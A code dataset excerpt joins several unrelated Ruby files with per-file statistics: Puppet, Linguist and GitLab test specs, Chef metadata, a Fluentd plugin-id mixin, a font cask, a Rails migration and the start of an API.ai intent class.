      def release_by_tag(repo, tag, options = {})
        get("#{Repository.path(repo)}/releases/tags/#{tag}", options)
      end
    end
  end
end
| 47.909639 | 261 | 0.663146 |
ed3bef1fef2c6e951e888652e1115a24974c2547 | 4,359 | #!/usr/bin/env rspec
require 'spec_helper'
property = Puppet::Type.type(:file).attrclass(:owner)

describe property do
  before do
    # FIXME: many of these tests exercise the provider rather than `owner`
    # and should be moved into provider tests. ~JW
    @provider = Puppet::Type.type(:file).provider(:posix).new
    @provider.stubs(:uid).with("one").returns(1)

    @resource = stub 'resource', :line => "foo", :file => "bar"
    @resource.stubs(:[]).returns "foo"
    @resource.stubs(:[]).with(:path).returns "/my/file"
    @resource.stubs(:provider).returns @provider

    @owner = property.new :resource => @resource
  end

  it "should have a method for testing whether an owner is valid" do
    @provider.must respond_to(:validuser?)
  end

  it "should return the found uid if an owner is valid" do
    @provider.expects(:uid).with("foo").returns 500
    @provider.validuser?("foo").should == 500
  end

  it "should return false if an owner is not valid" do
    @provider.expects(:uid).with("foo").returns nil
    @provider.validuser?("foo").should be_false
  end

  describe "when retrieving the current value" do
    it "should return :absent if the file cannot stat" do
      @resource.expects(:stat).returns nil
      @owner.retrieve.should == :absent
    end

    it "should get the uid from the stat instance from the file" do
      stat = stub 'stat', :ftype => "foo"
      @resource.expects(:stat).returns stat
      stat.expects(:uid).returns 500
      @owner.retrieve.should == 500
    end

    it "should warn and return :silly if the found value is higher than the maximum uid value" do
      Puppet.settings.expects(:value).with(:maximum_uid).returns 500
      stat = stub 'stat', :ftype => "foo"
      @resource.expects(:stat).returns stat
      stat.expects(:uid).returns 1000
      @provider.expects(:warning)
      @owner.retrieve.should == :silly
    end
  end

  describe "when determining if the file is in sync" do
    describe "and not running as root" do
      it "should warn once and return true" do
        Puppet.features.expects(:root?).returns false
        @provider.expects(:warnonce)
        @owner.should = [10]
        @owner.must be_safe_insync(20)
      end
    end

    # NOTE(review): this before block sits after the nested describe above;
    # RSpec still applies it to all examples in this group — but placing it
    # first would read more clearly.
    before do
      Puppet.features.stubs(:root?).returns true
    end

    it "should be in sync if 'should' is not provided" do
      @owner.must be_safe_insync(10)
    end

    it "should directly compare the owner values if the desired owner is an integer" do
      @owner.should = [10]
      @owner.must be_safe_insync(10)
    end

    it "should treat numeric strings as integers" do
      @owner.should = ["10"]
      @owner.must be_safe_insync(10)
    end

    it "should convert the owner name to an integer if the desired owner is a string" do
      @provider.expects(:uid).with("foo").returns 10
      @owner.should = %w{foo}
      @owner.must be_safe_insync(10)
    end

    it "should not validate that users exist when a user is specified as an integer" do
      @provider.expects(:uid).never
      @provider.validuser?(10)
    end

    it "should fail if it cannot convert an owner name to an integer" do
      @provider.expects(:uid).with("foo").returns nil
      @owner.should = %w{foo}
      lambda { @owner.safe_insync?(10) }.should raise_error(Puppet::Error)
    end

    it "should return false if the owners are not equal" do
      @owner.should = [10]
      @owner.should_not be_safe_insync(20)
    end
  end

  describe "when changing the owner" do
    before do
      @owner.should = %w{one}
      @owner.stubs(:path).returns "path"
      @owner.stubs(:uid).returns 500
    end

    it "should chown the file if :links is set to :follow" do
      @resource.expects(:[]).with(:links).returns :follow
      File.expects(:chown)
      @owner.sync
    end

    it "should lchown the file if :links is set to :manage" do
      @resource.expects(:[]).with(:links).returns :manage
      File.expects(:lchown)
      @owner.sync
    end

    it "should use the first valid owner in its 'should' list" do
      @owner.should = %w{one two three}
      @provider.expects(:validuser?).with("one").returns nil
      @provider.expects(:validuser?).with("two").returns 500
      @provider.expects(:validuser?).with("three").never

      File.expects(:chown).with(500, nil, "/my/file")
      @owner.sync
    end
  end
end
| 29.06 | 97 | 0.650837 |
87847df478d493ddbed8b9ad0d86f1acc2ff3d44 | 457 | #!/usr/bin/ruby -I.
require 'minitest/unit'
require 'tmpl'
include MiniTest
Unit.autorun
# Exercises Tmpl rendering against test.erb: a plain variable, an
# HTML-special-character variable, and defaults assigned inside the
# template itself.
class TestTmpl < Unit::TestCase
  def test_tmpl
    tmpl = Tmpl.new(file: "test.erb")
    tmpl.set('test1', 'value1')
    tmpl.set('test2', '<>&"')
    result = tmpl.result
    # Fixes vs. the original: assert_equal takes (expected, actual) — the
    # arguments were swapped, producing misleading failure diffs; a leftover
    # $stderr debug print was removed; and the cached `result` is reused
    # instead of rendering a second time.
    assert_equal(<<-EOF, result)
var test1 = value1
var test2 = <>&"
var test2_2 = 'test2 assigned'
var test3 = 'test3 assigned'
EOF
  end
end
| 18.28 | 37 | 0.654267 |
ffec6236d933c5111b856608f94bf24c6af5e2fb | 20,183 | require 'linguist/file_blob'
require 'test/unit'
require 'mime/types'
require 'pygments'
class TestBlob < Test::Unit::TestCase
include Linguist
Lexer = Pygments::Lexer
# Absolute path to the test fixtures directory (sibling of this file).
def fixtures_path
  File.expand_path("../fixtures", __FILE__)
end
# Builds a FileBlob for the fixture +name+, rooted at the fixtures dir.
def blob(name)
  FileBlob.new(File.join(fixtures_path, name), fixtures_path)
end
# Like #blob, but renames the blob to extensionless 'script' so language
# detection must rely on content (e.g. shebang) instead of the extension.
def script_blob(name)
  blob = blob(name)
  blob.instance_variable_set(:@name, 'script')
  blob
end
# The blob's name is the fixture's basename.
def test_name
  assert_equal "foo.rb", blob("foo.rb").name
end
# The blob exposes its name as a Pathname.
def test_pathname
  assert_equal Pathname.new("foo.rb"), blob("foo.rb").pathname
end
# MIME type is derived from the file extension (or a generic fallback).
def test_mime_type
  assert_equal "application/octet-stream", blob("dog.o").mime_type
  assert_equal "application/ogg", blob("foo.ogg").mime_type
  assert_equal "application/postscript", blob("octocat.ai").mime_type
  assert_equal "application/x-ruby", blob("grit.rb").mime_type
  assert_equal "application/x-sh", blob("script.sh").mime_type
  assert_equal "application/xml", blob("bar.xml").mime_type
  assert_equal "text/plain", blob("README").mime_type
end
# Content-Type adds a detected charset for text files; script files are
# served as text/plain rather than their executable MIME types.
def test_content_type
  assert_equal "application/octet-stream", blob("dog.o").content_type
  assert_equal "application/ogg", blob("foo.ogg").content_type
  assert_equal "application/pdf", blob("foo.pdf").content_type
  assert_equal "image/png", blob("foo.png").content_type
  assert_equal "text/plain; charset=iso-8859-2", blob("README").content_type
  assert_equal "text/plain; charset=iso-8859-1", blob("script.pl").content_type
  assert_equal "text/plain; charset=iso-8859-1", blob("script.py").content_type
  assert_equal "text/plain; charset=iso-8859-1", blob("script.rb").content_type
  assert_equal "text/plain; charset=iso-8859-1", blob("script.sh").content_type
end
# Binary-ish files get an attachment disposition (name URL-escaped);
# viewable text and images are served inline.
def test_disposition
  assert_equal "attachment; filename=foo+bar.jar", blob("foo bar.jar").disposition
  assert_equal "attachment; filename=foo.bin", blob("foo.bin").disposition
  assert_equal "attachment; filename=linguist.gem", blob("pkg/linguist.gem").disposition
  assert_equal "attachment; filename=octocat.ai", blob("octocat.ai").disposition
  assert_equal "inline", blob("README").disposition
  assert_equal "inline", blob("foo.txt").disposition
  assert_equal "inline", blob("grit.rb").disposition
  assert_equal "inline", blob("octocat.png").disposition
end
# #data returns the raw file contents.
def test_data
  assert_equal "module Foo\nend\n", blob("foo.rb").data
end
# #lines splits on newlines; the trailing newline yields a final "".
def test_lines
  assert_equal ["module Foo", "end", ""], blob("foo.rb").lines
end
# #size is the byte size of the file.
def test_size
  assert_equal 15, blob("foo.rb").size
end
# #loc counts all lines.
def test_loc
  assert_equal 3, blob("foo.rb").loc
end
# #sloc counts only non-blank source lines.
def test_sloc
  assert_equal 2, blob("foo.rb").sloc
end
# Character-set detection for text blobs; binary blobs have no encoding.
def test_encoding
  assert_equal "ISO-8859-2", blob("README").encoding
  assert_equal "ISO-8859-1", blob("dump.sql").encoding
  assert_equal "UTF-8", blob("foo.txt").encoding
  assert_nil blob("dog.o").encoding
end
# Binary detection; also checks that a blob whose data was never loaded
# (simulated by stubbing #data to nil) is treated as binary.
def test_binary
  # Large blobs aren't loaded
  large_blob = blob("git.exe")
  large_blob.instance_eval do
    def data; end
  end
  assert large_blob.binary?

  assert blob("git.deb").binary?
  assert blob("git.exe").binary?
  assert blob("hello.pbc").binary?
  assert blob("linguist.gem").binary?
  assert blob("octocat.ai").binary?
  assert blob("octocat.png").binary?
  assert blob("zip").binary?

  assert !blob("README").binary?
  assert !blob("file.txt").binary?
  assert !blob("foo.rb").binary?
  assert !blob("script.pl").binary?
end
# Plain-text detection, including extensionless names like 'md'/'txt'.
def test_text
  assert blob("README").text?
  assert blob("dump.sql").text?
  assert blob("file.json").text?
  assert blob("file.txt").text?
  assert blob("md").text?
  assert blob("script.sh").text?
  assert blob("tender.md").text?
  assert blob("txt").text?
end
# Only web-displayable raster formats count as images (not .ai/.psd).
def test_image
  assert blob("octocat.gif").image?
  assert blob("octocat.jpeg").image?
  assert blob("octocat.jpg").image?
  assert blob("octocat.png").image?
  assert !blob("octocat.ai").image?
  assert !blob("octocat.psd").image?
end
# Viewable means renderable as text in the browser; images and binaries
# are not viewable even when they are displayable.
def test_viewable
  assert blob("README").viewable?
  assert blob("foo.rb").viewable?
  assert blob("script.pl").viewable?
  assert !blob("linguist.gem").viewable?
  assert !blob("octocat.ai").viewable?
  assert !blob("octocat.png").viewable?
end
# Heuristics that mark machine-generated files (Xcode projects, lockfiles,
# minified or compiled JS) so they can be excluded from language stats.
def test_generated
  assert !blob("README").generated?

  # Xcode project files
  assert blob("MainMenu.xib").generated?
  assert blob("MainMenu.nib").generated?
  assert blob("project.pbxproj").generated?

  # Gemfile.locks
  assert blob("Gemfile.lock").generated?

  # Generated .NET Docfiles
  assert blob("net_docfile.xml").generated?

  # Long line
  assert !blob("uglify.js").generated?

  # Inlined JS, but mostly code
  assert !blob("json2_backbone.js").generated?

  # Minified JS
  assert !blob("jquery-1.6.1.js").generated?
  assert blob("jquery-1.6.1.min.js").generated?
  assert blob("jquery-1.4.2.min.js").generated?

  # CoffeeScript-compiled JS
  # These examples are too basic to tell
  assert !blob("coffee/empty.js").generated?
  assert !blob("coffee/hello.js").generated?

  assert blob("coffee/intro-old.js").generated?
  assert blob("coffee/classes-old.js").generated?

  assert blob("coffee/intro.js").generated?
  assert blob("coffee/classes.js").generated?
end
# Path- and name-based heuristics that mark third-party (vendored) files
# so they can be excluded from language statistics.
def test_vendored
  assert !blob("README").vendored?

  # Node dependencies
  assert blob("node_modules/coffee-script/lib/coffee-script.js").vendored?

  # Rails vendor/
  assert blob("vendor/plugins/will_paginate/lib/will_paginate.rb").vendored?

  # C deps
  assert blob("deps/http_parser/http_parser.c").vendored?
  assert blob("deps/v8/src/v8.h").vendored?

  # Prototype
  assert !blob("public/javascripts/application.js").vendored?
  assert blob("public/javascripts/prototype.js").vendored?
  assert blob("public/javascripts/effects.js").vendored?
  assert blob("public/javascripts/controls.js").vendored?
  assert blob("public/javascripts/dragdrop.js").vendored?

  # jQuery
  assert blob("jquery.js").vendored?
  assert blob("public/javascripts/jquery.js").vendored?
  assert blob("public/javascripts/jquery.min.js").vendored?
  assert blob("public/javascripts/jquery-1.7.js").vendored?
  assert blob("public/javascripts/jquery-1.7.min.js").vendored?
  assert blob("public/javascripts/jquery-1.5.2.js").vendored?
  assert blob("public/javascripts/jquery-1.6.1.js").vendored?
  assert blob("public/javascripts/jquery-1.6.1.min.js").vendored?
  assert !blob("public/javascripts/jquery.github.menu.js").vendored?

  # MooTools
  assert blob("public/javascripts/mootools-core-1.3.2-full-compat.js").vendored?
  assert blob("public/javascripts/mootools-core-1.3.2-full-compat-yc.js").vendored?

  # Dojo
  assert blob("public/javascripts/dojo.js").vendored?

  # MochiKit
  assert blob("public/javascripts/MochiKit.js").vendored?

  # YUI
  assert blob("public/javascripts/yahoo-dom-event.js").vendored?
  assert blob("public/javascripts/yahoo-min.js").vendored?
  assert blob("public/javascripts/yuiloader-dom-event.js").vendored?

  # LESS
  assert blob("public/javascripts/less-1.1.0.js").vendored?
  assert blob("public/javascripts/less-1.1.0.min.js").vendored?

  # WYS editors
  assert blob("public/javascripts/ckeditor.js").vendored?
  assert blob("public/javascripts/tiny_mce.js").vendored?
  assert blob("public/javascripts/tiny_mce_popup.js").vendored?
  assert blob("public/javascripts/tiny_mce_src.js").vendored?

  # Fabric
  assert blob("fabfile.py").vendored?

  # WAF
  assert blob("waf").vendored?

  # Visual Studio IntelliSense
  assert blob("Scripts/jquery-1.7-vsdoc.js").vendored?

  # Microsoft Ajax
  assert blob("Scripts/MicrosoftAjax.debug.js").vendored?
  assert blob("Scripts/MicrosoftAjax.js").vendored?
  assert blob("Scripts/MicrosoftMvcAjax.debug.js").vendored?
  assert blob("Scripts/MicrosoftMvcAjax.js").vendored?
  assert blob("Scripts/MicrosoftMvcValidation.debug.js").vendored?
  assert blob("Scripts/MicrosoftMvcValidation.js").vendored?

  # jQuery validation plugin (MS bundles this with asp.net mvc)
  assert blob("Scripts/jquery.validate.js").vendored?

  # NuGet Packages
  assert blob("packages/Modernizr.2.0.6/Content/Scripts/modernizr-2.0.6-development-only.js").vendored?
end
# Files that should be indexed for code search vs. those that should not
# (binary-ish, generated, or data-only extensions).
def test_indexable
  indexable     = %w[file.txt foo.rb]
  not_indexable = %w[defu.nkt dump.sql github.po linguist.gem]

  indexable.each { |path| assert blob(path).indexable? }
  not_indexable.each { |path| assert !blob(path).indexable? }
end
# Exhaustive language-detection checks: one assertion per fixture file,
# grouped by extension-disambiguation case (e.g. .cls, .pl, .m, .r, .t, .v).
# Each `blob(name)` wraps a fixture file; `.language` is the detected Language.
def test_language
  assert_equal Language['C'], blob("hello.c").language
  assert_equal Language['C'], blob("hello.h").language
  assert_equal Language['C++'], blob("bar.h").language
  assert_equal Language['C++'], blob("bar.hpp").language
  assert_equal Language['C++'], blob("hello.cpp").language
  assert_equal Language['C++'], blob("cuda.cu").language
  assert_equal Language['GAS'], blob("hello.s").language
  assert_equal Language['Logtalk'], blob("foo.lgt").language
  assert_equal Language['Objective-C'], blob("Foo.h").language
  assert_equal Language['Objective-C'], blob("Foo.m").language
  assert_equal Language['Objective-C'], blob("FooAppDelegate.h").language
  assert_equal Language['Objective-C'], blob("FooAppDelegate.m").language
  assert_equal Language['Objective-C'], blob("hello.m").language
  assert_equal Language['OpenCL'], blob("fft.cl").language
  assert_equal Language['Ruby'], blob("foo.rb").language
  assert_equal Language['Ruby'], blob("script.rb").language
  assert_equal Language['Ruby'], blob("wrong_shebang.rb").language
  assert_equal Language['Arduino'], blob("hello.ino").language
  assert_equal Language['VHDL'], blob("foo.vhd").language
  # Binary files have no language at all.
  assert_nil blob("octocat.png").language

  # .cls disambiguation
  # https://github.com/abevoelker/abl-email-client/blob/master/com/abevoelker/email/Email.cls
  assert_equal Language['OpenEdge ABL'], blob("Email.cls").language
  # https://github.com/emcmanis/Thesis/blob/master/TeX/Thesis%20Template/reedthesis.cls
  assert_equal Language['TeX'], blob("reedthesis.cls").language
  # https://github.com/DangerMouseB/VLMessaging/blob/master/VLMMachineRouter/cApplication.cls
  assert_equal Language['Visual Basic'], blob("cApplication.cls").language
  # https://github.com/apex-commons/base/blob/master/src/classes/ArrayUtils.cls
  assert_equal Language['Apex'], blob("ArrayUtils.cls").language

  # .pl disambiguation
  assert_equal Language['Prolog'], blob("test-prolog.pl").language
  assert_equal Language['Perl'], blob("test-perl.pl").language
  assert_equal Language['Perl'], blob("test-perl2.pl").language

  # .m disambiguation
  assert_equal Language['Objective-C'], blob("Foo.m").language
  assert_equal Language['Objective-C'], blob("hello.m").language
  assert_equal Language['Matlab'], blob("matlab_function.m").language
  assert_equal Language['Matlab'], blob("matlab_script.m").language

  # .r disambiguation
  assert_equal Language['R'], blob("hello-r.R").language
  assert_equal Language['Rebol'], blob("hello-rebol.r").language

  # .t disambiguation
  assert_equal Language['Perl'], blob("perl-test.t").language
  assert_equal Language['Turing'], blob("turing.t").language

  # .v disambiguation
  # https://github.com/progranism/Open-Source-FPGA-Bitcoin-Miner/blob/master/src/sha-256-functions.v
  assert_equal Language['Verilog'], blob("sha-256-functions.v").language
  # https://github.com/coq/coq/blob/trunk/doc/faq/interval_discr.v
  assert_equal Language['Coq'], blob("interval_discr.v").language

  # ML
  assert_equal Language['OCaml'], blob("Foo.ml").language
  assert_equal Language['Standard ML'], blob("Foo.sig").language
  assert_equal Language['Standard ML'], blob("Foo.sml").language

  # Scilab
  assert_equal Language['Scilab'], blob("scilab_script.sce").language
  assert_equal Language['Scilab'], blob("scilab_function.sci").language
  assert_equal Language['Scilab'], blob("scilab_test.tst").language

  # Config files
  assert_equal Language['INI'], blob(".gitconfig").language
  assert_equal Language['Shell'], blob(".bash_profile").language
  assert_equal Language['Shell'], blob(".bashrc").language
  assert_equal Language['Shell'], blob(".profile").language
  assert_equal Language['Shell'], blob(".zlogin").language
  assert_equal Language['Shell'], blob(".zshrc").language
  assert_equal Language['VimL'], blob(".gvimrc").language
  assert_equal Language['VimL'], blob(".vimrc").language
  assert_equal Language['YAML'], blob(".gemrc").language

  # Files with no extension and no recognizable content stay undetected.
  assert_nil blob("blank").language
  assert_nil blob("README").language

  # https://github.com/xquery/xprocxq/blob/master/src/xquery/xproc.xqm
  assert_equal Language['XQuery'], blob("xproc.xqm").language

  # https://github.com/wycats/osx-window-sizing/blob/master/center.applescript
  assert_equal Language['AppleScript'], blob("center.scpt").language
  assert_equal Language['AppleScript'], blob("center.applescript").language

  # https://github.com/Araq/Nimrod/tree/master/examples
  assert_equal Language['Nimrod'], blob("foo.nim").language

  # http://supercollider.sourceforge.net/
  # https://github.com/drichert/BCR2000.sc/blob/master/BCR2000.sc
  assert_equal Language['SuperCollider'], blob("BCR2000.sc").language

  # https://github.com/harrah/xsbt/wiki/Quick-Configuration-Examples
  assert_equal Language['Scala'], blob('build.sbt').language

  # https://github.com/gradleware/oreilly-gradle-book-examples/blob/master/ant-antbuilder/build.gradle
  assert_equal Language['Groovy'], blob("build.gradle").language

  # http://docs.racket-lang.org/scribble/
  assert_equal Language['Racket'], blob("scribble.scrbl").language

  # https://github.com/drupal/drupal/blob/7.x/modules/php/php.module
  assert_equal Language['PHP'], blob("drupal.module").language

  # https://github.com/googleapi/googleapi/blob/master/demos/gmail_demo/gmail.dpr
  assert_equal Language['Delphi'], blob("program.dpr").language

  # https://github.com/philiplaureano/Nemerle.FizzBuzz/blob/master/FizzBuzz/FizzBuzzer.n
  assert_equal Language['Nemerle'], blob("hello.n").language

  # https://github.com/dharmatech/agave/blob/master/demos/asteroids.sps
  assert_equal Language['Scheme'], blob("asteroids.sps").language

  # https://github.com/graydon/rust
  assert_equal Language['Rust'], blob("hello.rs").language

  # https://github.com/olabini/ioke
  assert_equal Language['Ioke'], blob("hello.ik").language

  # https://github.com/parrot/parrot
  assert_equal Language['Parrot Internal Representation'], blob("hello.pir").language
  assert_equal Language['Parrot Assembly'], blob("hello.pasm").language

  # http://gosu-lang.org
  assert_equal Language['Gosu'], blob("Hello.gsx").language
  assert_equal Language['Gosu'], blob("hello.gsp").language
  assert_equal Language['Gosu'], blob("Hello.gst").language
  assert_equal Language['Gosu'], blob("hello.vark").language

  # Groovy Server Pages
  assert_equal Language['Groovy Server Pages'], blob("bar.gsp").language
  assert_equal Language['Groovy Server Pages'], blob("hello-resources.gsp").language
  assert_equal Language['Groovy Server Pages'], blob("hello-pagedirective.gsp").language
  assert_equal Language['Groovy Server Pages'], blob("hello-var.gsp").language

  # https://github.com/Lexikos/AutoHotkey_L
  assert_equal Language['AutoHotkey'], blob("hello.ahk").language

  # Haml
  assert_equal Language['Haml'], blob("hello.haml").language
  assert_equal Language['HTML'], blob("hello.haml").language.group

  # Sass
  assert_equal Language['Sass'], blob("screen.sass").language
  assert_equal Language['CSS'], blob("screen.sass").language.group
  assert_equal Language['SCSS'], blob("screen.scss").language
  assert_equal Language['CSS'], blob("screen.scss").language.group

  # OpenEdge ABL / Progress
  assert_equal Language['OpenEdge ABL'], blob("openedge.p").language

  # Tea
  assert_equal Language['Tea'], blob("foo.tea").language

  # Kotlin
  assert_equal Language['Kotlin'], blob("Foo.kt").language

  # Julia: http://julialang.org/
  assert_equal Language['Julia'], blob("stockcorr.jl").language

  # Dart: http://dartlang.org/
  assert_equal Language['Dart'], blob("point.dart").language
end
# Pygments lexer selection for a sampling of fixture files.
def test_lexer
  expected_lexers = {
    "dude-thing-okay--001.patch" => 'Diff',
    "dude.js"                    => 'JavaScript',
    "Capfile"                    => 'Ruby',
    "grit.rb"                    => 'Ruby',
    "dude.el"                    => 'Scheme',
    "README"                     => 'Text only',
    "foo.tea"                    => 'Tea',
    "foo.vhd"                    => 'vhdl',
    "stockcorr.jl"               => 'Julia',
    "point.dart"                 => 'Dart'
  }

  expected_lexers.each do |filename, lexer_name|
    assert_equal Lexer[lexer_name], blob(filename).lexer
  end
end
# The interpreter named on a fixture's shebang line determines
# #shebang_script; files without a shebang have none.
def test_shebang_script
  assert_equal 'sh', script_blob("script.sh").shebang_script
  assert_equal 'bash', script_blob("script.bash").shebang_script
  assert_equal 'zsh', script_blob("script.zsh").shebang_script
  assert_equal 'perl', script_blob("script.pl").shebang_script
  assert_equal 'ruby', script_blob("script.rb").shebang_script
  assert_equal 'ruby', script_blob("script2.rb").shebang_script
  assert_equal 'python', script_blob("script.py").shebang_script
  assert_equal 'node', script_blob("script.js").shebang_script
  assert_equal 'groovy', script_blob("script.groovy").shebang_script
  assert_equal 'macruby', script_blob("script.mrb").shebang_script
  assert_equal 'rake', script_blob("script.rake").shebang_script
  assert_equal 'foo', script_blob("script.foo").shebang_script
  assert_equal 'nush', script_blob("script.nu").shebang_script
  assert_equal 'scala', script_blob("script.scala").shebang_script
  assert_equal 'racket', script_blob("script.rkt").shebang_script
  # assert_nil instead of assert_equal(nil, ...): the latter is deprecated
  # and raises in modern minitest.
  assert_nil script_blob("foo.rb").shebang_script
end
# Shebang interpreters map onto Languages; unknown interpreters and files
# without a shebang map to nothing.
def test_shebang_language
  assert_equal Language['Shell'], script_blob("script.sh").shebang_language
  assert_equal Language['Shell'], script_blob("script.bash").shebang_language
  assert_equal Language['Shell'], script_blob("script.zsh").shebang_language
  assert_equal Language['Perl'], script_blob("script.pl").shebang_language
  assert_equal Language['Ruby'], script_blob("script.rb").shebang_language
  assert_equal Language['Python'], script_blob("script.py").shebang_language
  assert_equal Language['JavaScript'], script_blob("script.js").shebang_language
  assert_equal Language['Groovy'], script_blob("script.groovy").shebang_language
  assert_equal Language['Ruby'], script_blob("script.mrb").shebang_language
  assert_equal Language['Ruby'], script_blob("script.rake").shebang_language
  assert_equal Language['Nu'], script_blob("script.nu").shebang_language
  assert_equal Language['Scala'], script_blob("script.scala").shebang_language
  assert_equal Language['Racket'], script_blob("script.rkt").shebang_language
  # assert_nil instead of assert_equal(nil, ...): the latter is deprecated
  # and raises in modern minitest.
  assert_nil script_blob("script.foo").shebang_language
  assert_nil script_blob("foo.rb").shebang_language
end
# Highlighting wraps the Pygments output in the standard
# <div class="highlight"> wrapper. The heredoc body is whitespace-sensitive:
# do not re-indent its content lines.
def test_colorize
  assert_equal <<-HTML, blob("foo.rb").colorize
<div class="highlight"><pre><span class="k">module</span> <span class="nn">Foo</span>
<span class="k">end</span>
</pre>
</div>
  HTML
end
# Same highlighting, but without the enclosing <div>/<pre> wrapper.
# The heredoc body is whitespace-sensitive: do not re-indent its content lines.
def test_colorize_without_wrapper
  assert_equal <<-HTML, blob("foo.rb").colorize_without_wrapper
<span class="k">module</span> <span class="nn">Foo</span>
<span class="k">end</span>
  HTML
end
# Minified assets are never highlighted: colorize returns nil for them.
def test_colorize_skips_minified_files
  assert_nil blob("jquery-1.6.1.min.js").colorize
end
end
| 39.730315 | 105 | 0.705297 |
# Chef cookbook metadata for the "lempit" LEMP development stack.
name             'lempit'
maintainer       'Ross Timson'
maintainer_email '[email protected]'
license          'MIT'
description      'Installs a LEMP stack for local development of PHP projects.'
long_description IO.read(File.join(File.dirname(__FILE__), 'README.md'))
version          '0.1.0'

# Cookbooks this one builds on.
%w[mysql nginx php].each do |cookbook|
  depends cookbook
end

supports 'ubuntu'
87b1bc7ff13b6fbb8f18f64684c7ad9bfbadb96d | 2,701 | #
# Fluent
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require 'set'
require 'fluent/env'
require 'fluent/variable_store'
module Fluent
  # Mixin that manages a plugin's identifier (the `@id` configuration key):
  # registers ids in a process-wide store so duplicates can be rejected, and
  # derives a per-plugin working directory under the system root_dir.
  module PluginId
    def initialize
      super
      @_plugin_id_variable_store = nil
      @_plugin_root_dir = nil
      @id = nil
    end

    # Reads `@id` from the plugin configuration and registers it so a
    # duplicated id elsewhere in the configuration raises a ConfigError.
    def configure(conf)
      # NOTE(review): ':pluing_id' (sic) is the existing store key; renaming it
      # would orphan entries registered under it elsewhere, so it is kept.
      @_plugin_id_variable_store = Fluent::VariableStore.fetch_or_build(:pluing_id, default_value: Set.new)
      @id = conf['@id']
      @_id_configured = !!@id # plugin id is explicitly configured by users (or not)
      if @id
        @id = @id.to_s
        if @_plugin_id_variable_store.include?(@id) && !plugin_id_for_test?
          raise Fluent::ConfigError, "Duplicated plugin id `#{@id}`. Check whole configuration and fix it."
        end
        @_plugin_id_variable_store.add(@id)
      end

      super
    end

    # Heuristic: true when any caller frame comes from a test file
    # (test_*.rb), where duplicated plugin ids are tolerated.
    def plugin_id_for_test?
      caller_locations.each do |location|
        # Thread::Backtrace::Location#path returns base filename or absolute path.
        # #absolute_path returns absolute_path always.
        # https://bugs.ruby-lang.org/issues/12159
        if location.absolute_path =~ /\/test_[^\/]+\.rb$/ # location.path =~ /test_.+\.rb$/
          return true
        end
      end
      false
    end

    # true when the user set `@id` explicitly; nil before #configure ran.
    def plugin_id_configured?
      if instance_variable_defined?("@_id_configured")
        @_id_configured
      end
    end

    # The explicit id when configured, otherwise an object-id based fallback.
    def plugin_id
      if instance_variable_defined?("@id")
        @id || "object:#{object_id.to_s(16)}"
      else
        "object:#{object_id.to_s(16)}"
      end
    end

    # Per-plugin working directory: <root_dir>/worker<N>/<plugin_id>.
    # Returns nil unless root_dir is set and the id was explicitly configured.
    # Creates the directory (with the configured permission) on first call and
    # memoizes the frozen path.
    def plugin_root_dir
      return @_plugin_root_dir if @_plugin_root_dir
      return nil unless system_config.root_dir
      return nil unless plugin_id_configured?

      # Fluent::Plugin::Base#fluentd_worker_id
      dir = File.join(system_config.root_dir, "worker#{fluentd_worker_id}", plugin_id)
      FileUtils.mkdir_p(dir, mode: system_config.dir_permission || Fluent::DEFAULT_DIR_PERMISSION) unless Dir.exist?(dir)
      @_plugin_root_dir = dir.freeze
      dir
    end

    # Deregisters the id so it can be reused after this plugin stops.
    def stop
      if @_plugin_id_variable_store
        @_plugin_id_variable_store.delete(@id)
      end

      super
    end
  end
end
| 28.734043 | 121 | 0.664198 |
7968c9425f2ac498481ae46059b4824913c11962 | 819 | require 'spec_helper'
# Generates a static HTML fixture for frontend (JavaScript) tests from the
# rendered Prometheus service settings page.
describe Projects::ServicesController, '(JavaScript fixtures)', type: :controller do
  include JavaScriptFixturesHelpers

  let(:admin) { create(:admin) }
  let(:namespace) { create(:namespace, name: 'frontend-fixtures' )}
  let(:project) { create(:project_empty_repo, namespace: namespace, path: 'services-project') }
  # let! so the service exists before the request is made.
  let!(:service) { create(:prometheus_service, project: project) }

  # Render real view templates — the fixture is the rendered HTML.
  render_views

  before(:all) do
    # Remove stale fixtures so only freshly generated ones remain.
    clean_frontend_fixtures('services/prometheus')
  end

  before do
    sign_in(admin)
  end

  # The example description doubles as the output fixture path.
  it 'services/prometheus/prometheus_service.html.raw' do |example|
    get :edit,
      namespace_id: namespace,
      project_id: project,
      id: service.to_param

    expect(response).to be_success
    store_frontend_fixture(response, example.description)
  end
end
| 26.419355 | 97 | 0.71917 |
ab1ed9c24c8232468ec67a4d36a41424b1cae680 | 328 | cask 'font-tauri' do
version :latest
sha256 :no_check
# github.com/google/fonts was verified as official when first introduced to the cask
url 'https://github.com/google/fonts/raw/master/ofl/tauri/Tauri-Regular.ttf'
name 'Tauri'
homepage 'http://www.google.com/fonts/specimen/Tauri'
font 'Tauri-Regular.ttf'
end
| 27.333333 | 86 | 0.743902 |
# Migration: creates the todo_items table, which links a suggested action
# (with display text/image) to a plaque and a user.
class CreateTodoItems < ActiveRecord::Migration[4.2]
  def self.up
    create_table :todo_items do |t|
      # Free-text/display columns.
      %i[description action url image_url].each { |column| t.string column }

      # Foreign keys.
      t.integer :plaque_id
      t.integer :user_id

      t.timestamps
    end
  end

  def self.down
    drop_table :todo_items
  end
end
module Expando::ApiAi::Objects
  # Initialized with a hash representing an existing API.ai intent, and the path
  # to an Expando file for that intent, generates the JSON for a new version of
  # the intent.
  #
  # @see https://docs.api.ai/docs/intents#intent-object
  class Intent < Base
    # The list of attributes that can be removed from the intent JSON before updating.
    ATTRIBUTES_TO_REMOVE = %w{auto state priority webhookUsed lastUpdate fallbackIntent cortanaCommand}

    # !@attribute responses_file
    #   @return [Expando::SourceFiles::ResponsesFile]
    #     The Expando source file for this intent's responses.
    option :responses_file, default: proc { nil }

    # !@attribute entity_files
    #   @return [Array<Expando::SourceFiles::EntitiesFile>]
    #     The Expando entity source files.
    option :entity_files, default: proc { [] }

    # Properly perform all Expando transformations (expansion, annotation) to the
    # source for the intent, generate a new version of the intent's JSON, and update
    # it on API.ai.
    #
    # @return [void]
    def update!
      # Fetch the latest version of the intent from API.ai.
      intent_json = current_version

      # Replace the original utterances with the Expando-processed utterances, and
      # their new associated params.
